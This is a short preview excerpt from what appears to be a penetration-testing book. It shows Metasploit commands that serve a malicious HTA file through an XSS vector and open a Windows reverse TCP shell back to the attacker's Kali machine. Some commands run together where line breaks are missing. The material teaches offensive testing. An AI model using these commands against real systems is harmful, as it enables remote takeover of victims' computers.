August 2018
Intermediate to advanced
404 pages
10h 22m
English
What we are going to do is to use XSS to make the browser open and execute a malicious HTA file hosted in our Kali VM:
msfconsole
use exploit/windows/misc/hta_serverset payload windows/shell/reverse_tcp
set srvport 8888
set lport 12345show options

run
Notice the information ...
Read now
Unlock full access